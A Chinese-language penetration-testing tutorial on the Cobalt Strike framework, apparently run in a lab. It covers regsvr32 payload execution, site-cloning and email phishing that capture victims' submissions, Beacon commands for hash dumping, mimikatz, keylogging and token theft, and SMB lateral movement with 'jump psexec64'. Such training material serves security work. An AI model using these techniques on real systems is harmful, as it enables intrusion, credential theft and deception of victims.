\"regsvr32 [\/s] [\/n] [\/i(:cmdline)] dllname\u201d\u3002\n\u5176\u4e2ddllname\u4e3aactivex\u63a7\u4ef6\u6587\u4ef6\u540d\uff0c\u5efa\u8bae\u5728\u5b89\u88c5\u524d\u62f7\u8d1d\u5230system\u6587\u4ef6\u5939\u4e0b\u3002\n\u53c2\u6570\u6709\u5982\u4e0b\u610f\u4e49\uff1a\n\/u\u2014\u2014\u53cd\u6ce8\u518c\u63a7\u4ef6\uff08\u5378\u8f7dcom\u7ec4\u5efa\uff09\n\/s\u2014\u2014\u4e0d\u7ba1\u6ce8\u518c\u6210\u529f\u4e0e\u5426\uff0c\u5747\u4e0d\u663e\u793a\u63d0\u793a\u6846\uff08\u9759\u9ed8\u6a21\u5f0f\uff0c\u4e0d\u5f39\u6846\uff09\n\/c\u2014\u2014\u63a7\u5236\u53f0\u8f93\u51fa\n\/i\u2014\u2014\u8df3\u8fc7\u63a7\u4ef6\u7684\u9009\u9879\u8fdb\u884c\u5b89\u88c5(\u4f20\u7ed9DllInstall\u7684\u53c2\u6570\u5185\u5bb9\uff0cregsvr32 \u5141\u8bb8\u6ce8\u518c\u8fc7\u7a0b\u4e2d dll \u8fdb\u884c\u4e00\u4e9b\u81ea\n\u5b9a\u4e49\u7684\u5b89\u88c5\u8fc7\u7a0b\uff0c\u8be5\u8fc7\u7a0b\u5728 DllInstall \u4e2d\u5b9e\u73b0\u3002)\n\/n\u2014\u2014\u4e0d\u6ce8\u518c\u63a7\u4ef6\uff0c\u6b64\u9009\u9879\u5fc5\u987b\u4e0e\/i\u9009\u9879\u4e00\u8d77\u4f7f\u7528\nScrobj.dll:com\u670d\u52a1\u5668\uff0c\u5168\u540dWindows Script Component,DllInstall\u65b9\u6cd5\u5728\u8fd9\u4e2a\u7ec4\u4ef6\u4e2d\u5b9e\u73b0<\/code><\/pre>\n
Regsvr32.exe\u76f4\u63a5\u8c03\u7528dll\u7a0b\u5e8f  <\/p>\n
\"1746755590328-3dab7bab-3055-476e-aaf4-9875ec5ca385.png\"<\/p>\n
c:WindowsSystem32regsvr32.exe C:WindowsTempartifact.dll<\/code><\/pre>\n
\"1746755599192-0035b21c-cd56-4f95-b818-cd9bab59792f.png\"<\/p>\n
\"1746755602800-179e2046-79ac-4d09-844b-32fa3d3e83ff.png\"<\/p>\n
windwos\u53ef\u6267\u884c\u7a0b\u5e8f \uff08Stageless\uff09  <\/p>\n
Staged \u548c Stageless \u7684\u533a\u522b. \u524d\u8005\u7684\u5b9e\u9645\u529f\u80fd\u53ea\u662f\u548c C2 \u5efa\u7acb\u8fde\u63a5\u5e76\u63a5\u6536 Payload, \u7136\u540e\u52a0\u8f7d\u6267\u884c, \u800c Stageless \u76f4\u63a5\u7701\u53bb\u4e86\u63a5\u6536 Payload \u7684\u6b65\u9aa4. Stageless \u751f\u6210\u9664\u4e86\u7684 Payload \u90fd\u4f1a\u6bd4 Staged \u7c7b\u578b\u7684\u8981 \u5927\u5f88\u591a, \u800c\u4e14\u5305\u542b\u4e86\u7279\u5f81\u660e\u7ec6<\/p>\n
web\u9493\u9c7c\u6a21\u5757<\/h1>\n
cs\u63d0\u4f9b\u4e86\u9493\u9c7c\u6a21\u5757 \u65b9\u4fbf\u6e17\u900f\u6d4b\u8bd5\u4eba\u5458  <\/p>\n
Manage \u5bf9\u5f00\u542f\u7684web\u670d\u52a1\u8fdb\u884c\u7ba1\u7406\uff1b\nClone Site \u514b\u9686\u7f51\u7ad9\uff0c\u53ef\u4ee5\u8bb0\u5f55\u53d7\u5bb3\u8005\u63d0\u4ea4\u7684\u6570\u636e\uff1b\nHost File \u63d0\u4f9b\u4e00\u4e2a\u6587\u4ef6\u4e0b\u8f7d\uff0c\u53ef\u4ee5\u4fee\u6539Mime\u4fe1\u606f\uff1b\nScripted Web Delivery \u7c7b\u4f3c\u4e8emsf \u7684web_delivery ;\nSigned Applet Attack \u4f7f\u7528java\u81ea\u7b7e\u540d\u7684\u7a0b\u5e8f\u8fdb\u884c\u9493\u9c7c\u653b\u51fb;\nSmart Applet Attack \u81ea\u52a8\u68c0\u6d4bjava\u7248\u672c\u5e76\u8fdb\u884c\u653b\u51fb\uff0c\u9488\u5bf9Java 1.6.0_45\u4ee5\u4e0b\u4ee5\u53caJava 1.7.0_21\n\u4ee5\u4e0b\u7248\u672c\uff1b\nSystem Profiler \u7528\u6765\u83b7\u53d6\u4e00\u4e9b\u7cfb\u7edf\u4fe1\u606f\uff0c\u6bd4\u5982\u7cfb\u7edf\u7248\u672c\uff0cFlash\u7248\u672c\uff0c\u6d4f\u89c8\u5668\u7248\u672c\u7b49<\/code><\/pre>\n
\"1746755635762-2e04d6bb-dd6a-4525-a490-7dc05df99f48.png\"<\/p>\n
\u7ad9\u70b9\u7ba1\u7406 \u8fd9\u91cc\u4e3b\u8981\u662fcs\u81ea\u5e26\u7684web\u670d\u52a1\uff0c\u8bbf\u95eeip\u52a0\u4e0a\u7aef\u53e3 \u5219\u53ef\u4ee5\u8bbf\u95ee  <\/p>\n
\u514b\u9686\u7f51\u7ad9 \u8fd9\u4e2a\u6a21\u5757\u4e3b\u8981\u7684\u4f5c\u7528 \u514b\u9686\u4e00\u4e2a\u7f51\u7ad9 \u53d1\u9001\u7ed9\u53d7\u5bb3\u8005 \u53d7\u5bb3\u8005\u8bbf\u95ee\u7684\u65f6\u5019 \u53ef\u4ee5\u6536\u96c6\u53d7\u5bb3\u8005\u63d0\u4ea4\u7684 \u4fe1\u606f\uff0c\u540c\u65f6\u4e5f\u53ef\u4ee5\u9009\u62e9\u653b\u51fb\u4e0b\u8f7d\u6587\u4ef6<\/p>\n
\"1746755649187-f8e6334f-d67c-4586-afa2-ef7f79c6dc27.png\"<\/p>\n
\u53d7\u5bb3\u8005\u8bbf\u95ee \u7684\u65f6\u5019\u81ea\u52a8\u5f39\u51fa\u4e0b\u8f7d\u6587\u4ef6  <\/p>\n
\"1746755657423-a99e595a-fbdf-4ada-8eca-8b9952fb2ee1.png\"<\/p>\n
\u4fe1\u606f\u6a21\u5757 \u8fd9\u4e2a\u4e3b\u8981\u662f\u751f\u6210\u4e00\u4e2a\u9875\u9762 \u8ba9\u53d7\u5bb3\u8005\u8bbf\u95ee \u6536\u96c6\u53d7\u5bb3\u8005\u7684\u6d4f\u89c8\u5668\u7cfb\u7edf\u4fe1\u606f  <\/p>\n
\"1746755666432-1f6625e4-1db6-4fdf-b718-b54c4927f260.png\"<\/p>\n
\u8bbf\u95ee http:\/\/10.10.10.141:80\/baidu<\/a> \u8fde\u63a5\u540e \u6536\u96c6\u7684\u4fe1\u606f\u5728 web\u65e5\u5fd7\u67e5\u770b  <\/p>\n
\"1746755678230-27caf7a2-8aac-4d5c-a731-79ecff8786f1.png\"<\/p>\n
\u90ae\u4ef6\u9493\u9c7c<\/h1>\n
\u9996\u5148\u51c6\u5907eml\u7684\u9493\u9c7c\u6a21\u677f \u8fd9\u4e2a\u6a21\u677f\u53ef\u4ee5\u5728qq\u90ae\u7bb1\u91cc\u5bfc\u51fa  <\/p>\n
\"1746755691462-4555a6d3-b600-4cf4-a8dd-da6bff79391f.png\"<\/p>\n
\u51c6\u5907\u6a21\u677f\u540e \u9009\u62e9\u90ae\u7bb1\u9493\u9c7c\u6a21\u677f  <\/p>\n
\"1746755698921-e77a2593-4e7b-48ac-aa72-29f0947810b1.png\"<\/p>\n
\u70b9\u51fb\u53d1\u9001\u5373\u53ef \u6a21\u677f\u4e0a\u53ef\u4ee5\u770b\u5230 url\u8df3\u8f6c\u5230\u51c6\u5907\u597d\u7684url\u4e0a  <\/p>\n
Beacon\u7684\u4f7f\u7528<\/h1>\n
Beacon\u662fCobalt Strike\u4e3a\u9ad8\u7ea7\u653b\u51fb\u8005\u5efa\u6a21\u7684Payload\u3002\u4f7f\u7528Beacon\u901a\u8fc7HTTP\uff0cHTTPS\u6216DNS\u51fa\u53e3\u7f51 \u7edc\u3002\u800c\u4e14Beacon\u975e\u5e38\u7075\u6d3b\uff0c\u652f\u6301\u5f02\u6b65\u548c\u4ea4\u4e92\u5f0f\u901a\u4fe1\u3002\u5f02\u6b65\u901a\u4fe1\u65e2\u4f4e\u53c8\u6162\u3002Beacon\u5c06\u901a\u8baf\u672c\u5730\uff0c\u4e0b\u8f7d\u4efb \u52a1\uff0c\u7136\u540e\u8fdb\u5165\u7761\u7720\u72b6\u6001\u3002\u4ea4\u4e92\u5f0f\u901a\u4fe1\u5b9e\u65f6\u53d1\u751f  <\/p>\n
\"1746755724017-858d8bf4-2c3b-493c-8f9d-72a2ece692a3.png\"<\/p>\n
\"1746755730142-ded2f1f4-0708-4f5f-8c2b-c283e5564a15.png\"<\/p>\n
Command Description\n------- -----------\nargue   \u547d\u4ee4\u884c\u53c2\u6570\u6b3a\u9a97\nblockdlls \u7981\u6b62\u5b50\u8fdb\u7a0b\u52a0\u8f7d\u975e\u5fae\u8f6f\u7b7e\u540d\u7684dll\nbrowserpivot \u6ce8\u5165\u6d4f\u89c8\u5668\u8fdb\u7a0b\u4ee3\u7406\u7528\u6237\u5df2\u8ba4\u8bc1\u8eab\u4efd\uff08\u4ec5\u652f\u6301IE\uff09\ncancel  \u53d6\u6d88\u6b63\u5728\u4e0b\u8f7d\u7684\u6587\u4ef6\ncd          \u8df3\u8f6c\u76ee\u5f55\ncheckin \u5f3a\u5236\u76ee\u6807\u56de\u8fde\u5e76\u66f4\u65b0\u72b6\u6001\uff08\u7528\u4e8eDNS\u4e0a\u7ebf\uff0cDNS\u6a21\u5f0f\u4e0b\u65e0\u65b0\u4efb\u52a1\u65f6\u76ee\u6807\u4e0d\u4f1a\u56de\u8fdeTeamserver\uff09\nchromedump \u63d0\u53d6Chrome\u4fdd\u5b58\u7684\u8d26\u53f7\u5bc6\u7801\u3001Cookies\u7b49\u4fe1\u606f\nclear   \u6e05\u7a7abeacon\u4efb\u52a1\u961f\u5217\nconnect \u901a\u8fc7TCP\u6b63\u5411\u8fde\u63a5\u8fdc\u7a0bBeacon\ncovertvpn \u90e8\u7f72Covert VPN\u5ba2\u6237\u7aef\ncp          \u590d\u5236\u6587\u4ef6\ndcsync  \u4ece\u57df\u63a7\u63d0\u53d6\u5bc6\u7801hash\ndesktop \u8fdc\u7a0bVNC\u63a7\u5236\u7528\u6237\u684c\u9762\ndllinject \u6ce8\u5165\u4e00\u4e2a\u5185\u5b58\u53cd\u5c04\u52a0\u8f7d\u7684dll\u5230\u76ee\u6807\u8fdb\u7a0b\ndllload \u4f7f\u7528LoadLibrary\u65b9\u5f0f\u5728\u76ee\u6807\u8fdb\u7a0b\u4e2d\u52a0\u8f7d\u4e00\u4e2adll\ndownload \u4e0b\u8f7d\u6587\u4ef6\ndownloads \u5217\u51fa\u6240\u6709\u6b63\u5728\u4e0b\u8f7d\u7684\u6587\u4ef6\ndrives \u5217\u51fa\u6240\u6709\u78c1\u76d8\u76d8\u7b26\nelevate \u5229\u7528\u63d0\u6743\u6f0f\u6d1e\u83b7\u53d6\u4e00\u4e2a\u9ad8\u6743\u9650Beacon\nexecute \u5728\u76ee\u6807\u4e0a\u6267\u884c\u7a0b\u5e8f\uff08\u65e0\u56de\u663e\uff09\nexecute-assembly \u5728\u76ee\u6807\u4e0a\u5185\u5b58\u52a0\u8f7d\u6267\u884c\u672c\u5730.NET\u7a0b\u5e8f\nexit \u7ed3\u675f\u5f53\u524dBeacon\u4f1a\u8bdd\ngetprivs \u5728\u5f53\u524d\u8fdb\u7a0b\u8bbf\u95ee\u4ee4\u724c\uff08access token\uff09\u4e2d\u542f\u7528system\u7279\u6743\ngetsystem \u5c1d\u8bd5\u83b7\u53d6SYSTEM\u7528\u6237\u6743\u9650\ngetuid \u83b7\u53d6\u5f53\u524d\u8fdb\u7a0b\u8bbf\u95ee\u4ee4\u724c\uff08access token\uff09\u7684\u7528\u6237\u4fe1\u606f\nhashdump \u83b7\u53d6\u672c\u5730\u7528\u6237hash\nhelp \u5e2e\u52a9\u4fe1\u606f\ninject \u5728\u6307\u5b9a\u8fdb\u7a0b\u4e2d\u6ce8\u5165\u65b0\u7684Beacon\u4f1a\u8bdd\ninline-execute \u5728\u5f53\u524d\u4f1a\u8bdd\u4e2d\u6267\u884cBeacon Object File\njobkill \u7ed3\u675f\u4e00\u4e2a\u540e\u53f0\u4efb\u52a1\njobs \u5217\u51fa\u6240\u6709\u540e\u53f0\u4efb\u52a1\njump \u5728\u8fdc\u7a0b\u673a\u5668\u4e0a\u690d\u5165Beacon\uff08\u6a2a\u5411\u79fb\u52a8\uff09\nkerberos_ccache_use \u4ececcache\u6587\u4ef6\u5bfc\u5165kerberos\u7968\u636e\u5230\u5f53\u524d\u4f1a\u8bdd\u4e2d\nkerberos_ticket_purge \u6e05\u7a7a\u5f53\u524d\u4f1a\u8bdd\u4e2d\u7684\u6240\u6709kerberos\u7968\u636e\nkerberos_ticket_use \u4eceticket\u6587\u4ef6\u4e2d\u5bfc\u5165kerberos\u7968\u636e\u5230\u5f53\u524d\u4f1a\u8bdd\u4e2d\nkeylogger \u5f00\u542f\u952e\u76d8\u8bb0\u5f55\nkill \u7ed3\u675f\u6307\u5b9a\u8fdb\u7a0b\nlink \u901a\u8fc7\u547d\u540d\u7ba1\u9053\u6b63\u5411\u8fde\u63a5\u8fdc\u7a0bBeacon\nlogonpasswords \u4f7f\u7528mimikatz\u83b7\u53d6\u5bc6\u7801\u548chash\nls \u5217\u51fa\u76ee\u5f55\u6587\u4ef6\nmake_token \u521b\u5efa\u8fdb\u7a0b\u8bbf\u95ee\u4ee4\u724c\uff08access token\uff09\uff0c\u4ec5\u7528\u4e8e\u8bbf\u95ee\u7f51\u7edc\u8d44\u6e90\nmimikatz \u8fd0\u884cmimikatz\nmkdir \u521b\u5efa\u76ee\u5f55\nmode dns \u4f7f\u7528DNS A\u8bb0\u5f55\u4f5c\u4e3a\u6570\u636e\u901a\u9053\uff08\u4ec5\u652f\u6301DNS\u4e0a\u7ebfBeacon\uff09\nmode dns-txt \u4f7f\u7528DNS TXT\u8bb0\u5f55\u4f5c\u4e3a\u6570\u636e\u901a\u9053\uff08\u4ec5\u652f\u6301DNS\u4e0a\u7ebfBeacon\uff09\nmode dns6 \u4f7f\u7528DNS AAAA\u8bb0\u5f55\u4f5c\u4e3a\u6570\u636e\u901a\u9053\uff08\u4ec5\u652f\u6301DNS\u4e0a\u7ebfBeacon\uff09\nmv \u79fb\u52a8\u6587\u4ef6\nnet \u7f51\u7edc\u548c\u4e3b\u673a\u63a2\u6d4b\u5de5\u5177\uff08\u5185\u7f6enet\u547d\u4ee4\uff09\nnote \u7ed9\u5f53\u524d\u4f1a\u8bdd\u6dfb\u52a0\u5907\u6ce8\u4fe1\u606f\nportscan \u7f51\u7edc\u7aef\u53e3\u626b\u63cf\npowerpick \u5185\u5b58\u6267\u884cPowershell\u547d\u4ee4\uff08\u4e0d\u8c03\u7528powershell.exe\uff09\npowershell \u901a\u8fc7powershell.exe\u6267\u884cPowershell\u547d\u4ee4\npowershell-import \u5bfc\u5165\u672c\u5730powershell\u811a\u672c\u5230\u5f53\u524d\u4f1a\u8bdd\u4e2d\nppid \u4e3a\u6240\u6709\u65b0\u8fd0\u884c\u7684\u8fdb\u7a0b\u8bbe\u7f6e\u4f2a\u9020\u7684\u7236\u8fdb\u7a0bPID\nprintscreen \u4f7f\u7528PrintScr\u65b9\u5f0f\u622a\u5c4f\nps \u663e\u793a\u8fdb\u7a0b\u5217\u8868\npsinject \u6ce8\u5165\u5230\u6307\u5b9a\u8fdb\u7a0b\u540e\u5728\u5185\u5b58\u4e2d\u6267\u884cPowershell\u547d\u4ee4\uff08\u4e0d\u8c03\u7528\npowershell.exe)\npth \u4f7f\u7528Mimikatz\u6267\u884cPass-the-hash\npwd \u663e\u793a\u5f53\u524d\u76ee\u5f55\nreg \u67e5\u8be2\u6ce8\u518c\u8868\nremote-exec \u5728\u8fdc\u7a0b\u673a\u5668\u4e0a\u6267\u884c\u547d\u4ee4\uff08\u6a2a\u5411\u79fb\u52a8\uff09\nrev2self \u6062\u590d\u539f\u59cb\u8fdb\u7a0b\u8bbf\u95ee\u4ee4\u724c\uff08access token\uff09\nrm \u5220\u9664\u6587\u4ef6\u6216\u6587\u4ef6\u5939\nrportfwd \u53cd\u5411\u7aef\u53e3\u8f6c\u53d1\uff08\u4eceCobalt Strike Teamserver\u53d1\u8d77\u8fde\u63a5\uff09\nrportfwd_local \u53cd\u5411\u7aef\u53e3\u8f6c\u53d1\uff08\u4eceCobalt Strike\u5ba2\u6237\u7aef\u53d1\u8d77\u8fde\u63a5\uff09\nrun \u5728\u76ee\u6807\u4e0a\u6267\u884c\u7a0b\u5e8f\uff08\u6709\u56de\u663e\uff09\nrunas \u4ee5\u53e6\u4e00\u4e2a\u7528\u6237\u8eab\u4efd\u6267\u884c\u7a0b\u5e8f\nrunasadmin \u4ee5\u9ad8\u6743\u9650\u6267\u884c\u7a0b\u5e8f\nrunu \u4ee5\u53e6\u4e00\u4e2a\u8fdb\u7a0bPID\u4f5c\u4e3a\u7236\u8fdb\u7a0bPID\uff0c\u5e76\u4ee5\u5176\u7528\u6237\u8eab\u4efd\u6267\u884c\u7a0b\u5e8f\nscreenshot \u622a\u5c4f\nscreenwatch \u5c4f\u5e55\u76d1\u63a7\uff0c\u6bcf\u9694\u4e00\u6bb5\u65f6\u95f4\u622a\u5c4f\nsetenv \u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\nshell \u4f7f\u7528cmd.exe\u6267\u884c\u547d\u4ee4\nshinject \u6ce8\u5165shellcode\u5230\u6307\u5b9a\u8fdb\u7a0b\u4e2d\nshspawn \u521b\u5efa\u5080\u5121\u8fdb\u7a0b\u5e76\u6ce8\u5165shellcode\u5230\u5176\u4e2d\u8fd0\u884c\nsleep \u8bbe\u7f6ebeacon\u56de\u8fde\u95f4\u9694\u65f6\u95f4\nsocks \u542f\u52a8SOCKS4a\u4ee3\u7406\u670d\u52a1\u5668\nsocks stop \u505c\u6b62SOCKS4a\u4ee3\u7406\u670d\u52a1\u5668\nspawn \u521b\u5efa\u4e00\u4e2a\u65b0Beacon\u4f1a\u8bdd\nspawnas \u4ee5\u53e6\u4e00\u4e2a\u7528\u6237\u8eab\u4efd\u521b\u5efa\u4e00\u4e2a\u65b0Beacon\u4f1a\u8bdd\nspawnto \u8bbe\u7f6e\u521b\u5efa\u65b0\u8fdb\u7a0b\u65f6\u4f7f\u7528\u7684\u53ef\u6267\u884c\u6587\u4ef6\u8def\u5f84\uff08\u5080\u5121\u8fdb\u7a0b\u7684\u5bbf\u4e3bexe\u6587\u4ef6\u8def\u5f84\uff09\nspawnu \u4ee5\u53e6\u4e00\u4e2a\u8fdb\u7a0bPID\u4f5c\u4e3a\u7236\u8fdb\u7a0bPID\uff0c\u5e76\u4ee5\u5176\u7528\u6237\u8eab\u4efd\u521b\u5efa\u4e00\u4e2a\u65b0\nBeacon\u4f1a\u8bdd\nspunnel \u8fd0\u884c\u7b2c\u4e09\u65b9agent shellcode\u5e76\u5c06\u5176\u53cd\u5411\u4ee3\u7406\u5230\u63a7\u5236\u7aef\uff08\u4eceCobalt\nStrike Teamserver\u53d1\u8d77\u8fde\u63a5\uff09\nspunnel_local \u8fd0\u884c\u7b2c\u4e09\u65b9agent shellcode\u5e76\u5c06\u5176\u53cd\u5411\u4ee3\u7406\u5230\u63a7\u5236\u7aef\uff08\u4eceCobalt\nStrike\u5ba2\u6237\u7aef\u53d1\u8d77\u8fde\u63a5\uff09\nssh \u901a\u8fc7SSH\u8fde\u63a5\u8fdc\u7a0b\u4e3b\u673a\uff08\u4f7f\u7528\u8d26\u53f7\u5bc6\u7801\u8ba4\u8bc1\uff09\nssh-key \u901a\u8fc7SSH\u8fde\u63a5\u8fdc\u7a0b\u4e3b\u673a\uff08\u4f7f\u7528\u8bc1\u4e66\u79c1\u94a5\u8ba4\u8bc1\uff09\nsteal_token \u4ece\u6307\u5b9a\u8fdb\u7a0b\u4e2d\u7a83\u53d6\u8bbf\u95ee\u4ee4\u724c\uff08access token)\ntimestomp \u590d\u5236B\u6587\u4ef6\u7684\u521b\u5efa\u3001\u8bbf\u95ee\u3001\u4fee\u6539\u65f6\u95f4\u6233\u5230A\u6587\u4ef6\uff08\u6587\u4ef6\u65f6\u95f4\u6233\u4f2a\u9020\uff09\nunlink \u65ad\u5f00\u4e0ebeacon\u7684\u8fde\u63a5\uff08\u7528\u4e8e\u901a\u8fc7TCP\u3001\u547d\u540d\u7ba1\u9053\u8fde\u63a5\u7684beacon\uff09\nupload \u4e0a\u4f20\u6587\u4ef6<\/code><\/pre>\n
\u5728Cobalt Strike\u4e2d\u5b83\u7684\u5fc3\u8df3\u9ed8\u8ba4\u662f60s(\u5373sleep\u65f6\u95f4\u4e3a60s\uff0c\u6bcf\u4e00\u5206\u949f\u76ee\u6807\u4e3b\u673a\u4e0eteamserver\u901a\u4fe1\u4e00\u6b21)\uff0c \u8fd9\u4f1a\u8ba9\u6211\u4eec\u6267\u884c\u547d\u4ee4\u6216\u8fdb\u884c\u5176\u4ed6\u64cd\u4f5c\u54cd\u5e94\u5f88\u6162 \u4e00\u822c\u8bbe\u7f6e sleep 5 \u5373\u53ef\uff0c\u5982\u679c\u4f7f\u7528socks\u4ee3\u7406 \u8bbe\u7f6e\u4e3a sleep 0  <\/p>\n
\u5728beacon\u4e0d\u80fd\u76f4\u63a5\u4f7f\u7528\u7cfb\u7edf\u547d\u4ee4 \u60f3\u8981\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u9700\u8981\u4f7f\u7528 shell \u547d\u4ee4  <\/p>\n
SMB beacon  <\/p>\n
SMB Beacon\u4f7f\u7528\u547d\u540d\u7ba1\u9053\u901a\u8fc7\u7236\u7ea7Beacon\u8fdb\u884c\u901a\u8baf\uff0c\u5f53\u4e24\u4e2aBeacons\u94fe\u63a5\u540e\uff0c\u5b50Beacon\u4ece \u7236Beacon\u83b7\u53d6\u5230\u4efb\u52a1\u5e76\u53d1\u9001 \uff0c \u56e0\u4e3a\u94fe\u63a5\u7684Beacons\u4f7f\u7528Windows\u547d\u540d\u7ba1\u9053\u8fdb\u884c\u901a\u4fe1\uff0c\u6b64\u6d41\u91cf\u5c01\u88c5\u5728SMB\u534f\u8bae\u4e2d\uff0c\u6240\u4ee5SMB Beacon\u76f8 \u5bf9\u9690\u853d\uff0c\u7ed5\u9632\u706b\u5899\u65f6\u53ef\u80fd\u53d1\u6325\u5947\u6548  <\/p>\n
SMB beacon\u7684\u5de5\u4f5c\u6d41\u7a0b  <\/p>\n
\"1746755837064-1e9d7e0e-38d4-4f98-9be4-1779fd95baaf.png\"<\/p>\n
\u8fd9\u79cdbeacon\u8981\u6c42\u5177\u6709SMB Beacon\u7684\u4e3b\u673a\u5fc5\u987b\u63a5\u53d7\u7aef\u53e3445\u4e0a\u7684\u8fde\u63a5. \u6d3e\u751f\u4e00\u4e2aSMB Beacon\u65b9\u6cd5\uff1a\u5728Listner\u751f\u6210SMB Beacon>\u76ee\u6807\u4e3b\u673a>\u53f3\u952e> spawn as>\u9009\u4e2d\u5bf9\u5e94\u7684 Listener>\u4e0a\u7ebf \u6216\u5728beacon\u4e2d\u4f7f\u7528\u547d\u4ee4spawn smb\uff08smb\u4e3a\u6211\u7684smb listener\u540d\u5b57\uff09  <\/p>\n
\"1746755847477-b8faf5ac-bd14-4d5f-97a1-50a1ed8b415b.png\"<\/p>\n
\"1746755851782-5c9155f5-d1dc-49c4-97cc-33665f6c1655.png\"<\/p>\n
\"1746755858041-16e448e8-c528-462b-b822-1837091eb5fa.png\"<\/p>\n
\u8fd0\u884c\u6210\u529f\u540e\u5916\u90e8\u53ef\u4ee5\u770b\u5230\u221e\u221e\u8fd9\u4e2a\u5b57\u7b26\uff0c\u8fd9\u5c31\u662f\u6d3e\u751f\u7684SMB Beacon\u3002 \u5f53\u524d\u662f\u8fde\u63a5\u72b6\u6001\uff0c\u4f60\u53ef\u4ee5Beacon\u4e0a\u7528link \u547d\u4ee4\u94fe\u63a5\u4ed6\u6216\u8005unlink \u547d\u4ee4\u65ad\u5f00\u5b83\u3002  <\/p>\n
\"1746755868177-434b9060-d8ce-401a-9f5d-7f7cc95f298a.png\"<\/p>\n
\u8fd9\u79cdbeacon\u5728\u5185\u7f51\u6a2a\u5411\u6e17\u900f\u4e2d\u8fd0\u7528\u7684\u5f88\u591a\uff0c\u6a2a\u5411\u6e17\u900f\u7559\u5230\u65e5\u540e\u518d\u8bb2\u3002\u5728\u5185\u7f51\u73af\u5883\u4e2d\u53ef\u4ee5\u4f7f\u7528ipc $\u751f\u6210\u7684 SMB Beacon\u4e0a\u4f20\u5230\u76ee\u6807\u4e3b\u673a\u6267\u884c\uff0c\u4f46\u662f\u76ee\u6807\u4e3b\u673a\u5e76\u4e0d\u4f1a\u76f4\u63a5\u4e0a\u7ebf\u7684\uff0c\u9700\u8981\u6211\u4eec\u81ea\u5df1\u7528\u94fe\u63a5\u547d\u4ee4(link )\u53bb \u8fde\u63a5\u4ed6\u3002  <\/p>\n
\u5f53\u524d\u8fde\u63a512server5 \u56e0\u4e3a\u5bc6\u7801\u4e0e12server4\u76f8\u540c dir\u53ef\u4ee5\u8bbf\u95ee 12server5 c\u76d8 \u53ef\u4ee5\u4f7f\u7528jump psexec64\u5efa \u7acbsmb beacon  <\/p>\n
shell dir \\10.10.10.139c$ #\u8bbf\u95ee\u76ee\u6807c\u76d8\njump psexec64 \\10.10.10.139 smb \u521b\u5efasmb\u8fde\u63a5<\/code><\/pre>\n
\"1746755887106-755b7cf0-3d4d-41df-a0d8-bd5c2dbbb868.png\"<\/p>\n
\"1746755890410-39812250-86d5-4248-9fc0-57fcf01f915b.png\"<\/p>\n
\u622a\u56fe<\/h2>\n
\u53ef\u4ee5\u5728beacon\u91cc\u8f93\u5165\u547d\u4ee4  <\/p>\n
\"1746755904038-247e6f60-ad6a-45b4-845a-321e223b588c.png\"<\/p>\n
\"1746755907857-d4fa7f73-adfe-47fa-a7af-e870a9560ff1.png\"<\/p>\n
\u7aef\u53e3\u626b\u63cf<\/h2>\n
\u6d41\u91cf\u63a2\u6d4b \u7aef\u53e3\u626b\u63cf \u9009\u62e9\u626b\u63cf\u5b58\u6d3b\u7684\u65b9\u5f0f arp icmp \u9009\u62e9\u626b\u63cf\u7684\u7f51\u5361 \u4e5f\u53ef\u4ee5\u6307\u5b9a\u7aef\u53e3 <\/p>\n
\"1746755928932-6e0d6445-a086-4fe3-939b-687b1f9042be.png\"<\/p>\n
\u5728beacon \u4f7f\u7528\u547d\u4ee4 \u67e5\u770b\u540e\u53f0\u4efb\u52a1 jobs \u5173\u95ed\u4efb\u52a1 jobkill \u4efb\u52a1id  <\/p>\n
\"1746755936571-e1ceb348-8dfe-49c5-a338-4b2336430dac.png\"<\/p>\n
\u7f51\u7edc\u63a2\u6d4b<\/h1>\n
\/\/beacon \u63d0\u4f9bnet\u547d\u4ee4 \u4ee5\u4e0b\u662f\u8fd9\u4e2a\u547d\u4ee4\u7684\u4e00\u4e9b\u5e38\u7528\u65b9\u6cd5\nbeacon> help net\nUse: net [\u547d\u4ee4] [\u53c2\u6570]\nBeacon\u5185\u7f6e\u7684\u4e3b\u673a\u548c\u7f51\u7edc\u679a\u4e3e\u63a2\u6d4b\u5de5\u5177\u3002 \u652f\u6301\u7684 [\u547d\u4ee4] \u5217\u8868\u6709\uff1a\n\u547d\u4ee4 \u63cf\u8ff0\n------- -----------\ncomputers \u5217\u51fa\u57df\u4e2d\u7684\u4e3b\u673a\uff08\u901a\u8fc7\u7ec4\uff09\ndomain \u663e\u793a\u8be5\u4e3b\u673a\u7684\u57df\ndclist \u5217\u51fa\u57df\u63a7\u5236\u5668\ndomain_controllers \u5217\u51fa\u57df\u63a7\u5236\u5668\uff08\u901a\u8fc7\u7ec4\uff09\ndomain_trusts \u5217\u51fa\u57df\u4fe1\u4efb\ngroup \u5217\u51fa\u7ec4\u4e2d\u7684\u6210\u5458\u7ec4\u548c\u6210\u5458\u7528\u6237\nlocalgroup \u5217\u51fa\u672c\u5730\u7ec4\u4e2d\u7684\u6210\u5458\u7ec4\u548c\u6210\u5458\u7528\u6237\nlogons \u5217\u51fa\u767b\u5f55\u5230\u6307\u5b9a\u4e3b\u673a\u7684\u7528\u6237\nsessions \u5217\u51fa\u6307\u5b9a\u4e3b\u673a\u4e0a\u7684\u4f1a\u8bdd\nshare \u5217\u51fa\u6307\u5b9a\u4e3b\u673a\u4e0a\u7684\u5171\u4eab\nuser \u5217\u51fa\u7528\u6237\u548c\u7528\u6237\u4fe1\u606f\ntime \u663e\u793a\u6307\u5b9a\u4e3b\u673a\u4e0a\u7684\u65f6\u95f4\nview \u5217\u51fa\u57df\u4e2d\u7684\u4e3b\u673a\uff08\u901a\u8fc7browser\u670d\u52a1\uff09\n\u4f7f\u7528 \"help net [\u547d\u4ee4]\" \u4e86\u89e3\u66f4\u591a\u4fe1\u606f<\/code><\/pre>\n
\u67e5\u770b\u7f51\u7edc\u4fe1\u4efb\u4e3b\u673a  <\/p>\n
\"1746755975066-d9ee4ab1-3414-4dc0-9962-375f57fc327e.png\"<\/p>\n
\u5217\u51fa\u57df\u63a7  <\/p>\n
\"1746755982275-7e2422a4-6c3e-41b3-b07b-b4158f087c28.png\"<\/p>\n
\u6d4f\u89c8\u5668\u4ee3\u7406<\/h2>\n
\u5148\u628abeacon \u7b80\u4ecb\u65f6\u95f4\u8bbe\u7f6e\u4e3a0 sleep 0  <\/p>\n
